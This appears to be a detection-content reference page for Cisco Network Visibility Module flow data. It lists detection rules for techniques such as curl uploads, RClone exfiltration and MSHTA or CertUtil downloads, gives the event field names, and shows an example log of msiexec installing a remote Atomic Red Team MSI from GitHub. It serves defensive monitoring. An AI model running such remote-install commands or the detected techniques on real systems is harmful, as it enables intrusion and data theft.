Data Source: Cisco Network Visibility Module Flow Data

Description

Data source object for Netflow events from Cisco Network Visibility Module

Details

| Property | Value |
| --- | --- |
| Source | not_applicable |
| Sourcetype | cisco:nvm:flowdata |
| Name | Technique | Type |
| --- | --- | --- |
| Windows InstallUtil URL in Command Line | InstallUtil | TTP |
| Cisco NVM - Rundll32 Abuse of MSHTML.DLL for Payload Download | Mshta | Anomaly |
| Cisco NVM - Susp Script From Archive Triggering Network Activity | Visual Basic, Malicious File | Anomaly |
| Windows PowerShell FakeCAPTCHA Clipboard Execution | PowerShell, Windows Command Shell, Malicious Link | TTP |
| Cisco NVM - Outbound Connection to Suspicious Port | Non-Standard Port | Anomaly |
| Windows HTTP Network Communication From MSIExec | Msiexec | Anomaly |
| Cisco NVM - Suspicious Network Connection to IP Lookup Service API | System Network Configuration Discovery, IP Addresses | Anomaly |
| Cisco NVM - Curl Execution With Insecure Flags | BITS Jobs | Anomaly |
| WMIC XSL Execution via URL | XSL Script Processing | TTP |
| Windows Curl Upload to Remote Destination | Ingress Tool Transfer | TTP |
| Cisco NVM - Suspicious File Download via Headless Browser | Command and Scripting Interpreter, Ingress Tool Transfer | TTP |
| Cisco NVM - Suspicious Network Connection From Process With No Args | Process Injection, System Binary Proxy Execution | Anomaly |
| Windows File Download Via CertUtil | Ingress Tool Transfer | TTP |
| Detect HTML Help URL in Command Line | Compiled HTML File | TTP |
| Windows Curl Download to Suspicious Path | Ingress Tool Transfer | TTP |
| Cisco NVM - Non-Network Binary Making Network Connection | Masquerading, Process Injection | Anomaly |
| Cisco NVM - Suspicious Network Connection Initiated via MsXsl | XSL Script Processing | Anomaly |
| Cisco NVM - MSHTML or MSHTA Network Execution Without URL in CLI | Visual Basic, Mshta | Anomaly |
| Windows MSIExec Remote Download | Msiexec | Anomaly |
| Cisco NVM - Installation of Typosquatted Python Package | Command and Scripting Interpreter | TTP |
| Cisco NVM - Suspicious Download From File Sharing Website | BITS Jobs | Anomaly |
| Detect RClone Command-Line Usage | Automated Exfiltration | TTP |
| Windows File Download Via PowerShell | PowerShell, Ingress Tool Transfer | Anomaly |
| Attacker Tools On Endpoint | OS Credential Dumping, Match Legitimate Resource Name or Location, Active Scanning | TTP |
| Windows InstallUtil Remote Network Connection | InstallUtil | Anomaly |
| Detect MSHTA Url in Command Line | Mshta | TTP |
| Cisco NVM - Rclone Execution With Network Activity | Exfiltration to Cloud Storage | Anomaly |
| Cisco NVM - Webserver Download From File Sharing Website | Ingress Tool Transfer, Exploit Public-Facing Application | TTP |

Supported Apps

Event Fields

Fields

  • action
  • aditional_logged_in_user_list
  • aliul
  • bytes
  • bytes_in
  • bytes_out
  • da
  • date_hour
  • date_mday
  • date_minute
  • date_month
  • date_second
  • date_wday
  • date_year
  • date_zone
  • deserialize
  • dest
  • dest_hostname
  • dest_ip
  • dest_ipv6
  • dest_port
  • dh
  • direction
  • dp
  • dps
  • ds
  • eventtype
  • fd
  • fems
  • fes
  • fet
  • field
  • flow_dns_suffix
  • flow_end_msec
  • flow_end_sec
  • flow_end_time
  • flow_report_stage
  • flow_start_msec
  • flow_start_sec
  • flow_start_time
  • flow_version
  • fsg
  • fsms
  • fss
  • fst
  • fv
  • hh
  • hm
  • host
  • ht
  • http_host
  • http_method
  • ibc
  • iid
  • index
  • linecount
  • liuat
  • liuid
  • liuida
  • liuidp
  • logged_in_user
  • logged_in_user_account_type
  • logged_in_user_authority
  • logged_in_user_principal
  • mhl
  • mnl
  • module_hash_list
  • module_name_list
  • obc
  • pa
  • paa
  • pap
  • parent_process
  • parent_process_account
  • parent_process_arguments
  • parent_process_hash
  • parent_process_id
  • parent_process_integrity_level
  • parent_process_name
  • parent_process_path
  • parent_process_user_account_type
  • parg
  • ph
  • pid
  • pil
  • pn
  • ppa
  • pparg
  • ppath
  • pph
  • ppid
  • ppil
  • ppn
  • pppath
  • ppuat
  • pr
  • process
  • process_account_authority
  • process_account_principal
  • process_arguments
  • process_guid
  • process_hash
  • process_id
  • process_integrity_level
  • process_name
  • process_path
  • process_user_account_type
  • protocol_identifier
  • puat
  • puid
  • punct
  • sa
  • source
  • sourcetype
  • sp
  • splunk_server
  • splunk_server_group
  • sps
  • src
  • src_interface
  • src_ip
  • src_ipv6
  • src_port
  • tag
  • tag::action
  • tag::eventtype
  • timeendpos
  • timestamp
  • timestartpos
  • transport
  • udid
  • uri_path
  • user

Example Log

Jun 26 16:09:18 127.0.0.1 Jun 26 16:09:18 ip-172-31-30-201  fv="nvzFlow_v9" pr="6" sa="172.16.3.110" sp="5203" da="140.82.112.3" dp="443" fd="1" fss="1750954134" fst="Thu Jun 26 16:08:54 2025" fes="1750954134" fet="Thu Jun 26 16:08:54 2025" hh="'" hm="'" ht="'" udid="10E8A7F940225180BFDB748D2AE336EA7285CB8C" liuid="EC2AMAZ-E56LIG5\Administrator" liuida="EC2AMAZ-E56LIG5" liuidp="Administrator" liuat="2" pa="EC2AMAZ-E56LIG5\Administrator" paa="EC2AMAZ-E56LIG5" pap="Administrator" puat="8194" pn="msiexec.exe" ph="23EC37A4DF21893A1B3B6F5F72B2D78918E86C3A90F9664F8248A2C8219F889A" ppa="EC2AMAZ-E56LIG5\Administrator" ppuat="8194" ppn="cmd.exe" pph="41871DADE953D9F40F4AA445FC19982AB59D263C8AA93D7F67A1451663A09A57" ibc="0" obc="0" ds="us-east-2.compute.internal" dh="github.com" iid="4" mnl="'" mhl="'" fsms="1750954134331" fems="1750954134340" pid="8496" ppath="C:\Windows\system32\msiexec.exe" parg=" /i \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi\"" ppid="9232" pppath="C:\Windows\system32\cmd.exe" aliul="'" pil="12288" ppil="12288" fsg="1" puid="071161F29663831BB4A1C0FADA9805E0"

Required Output Fields

  • dest

Source: GitHub | Version: 2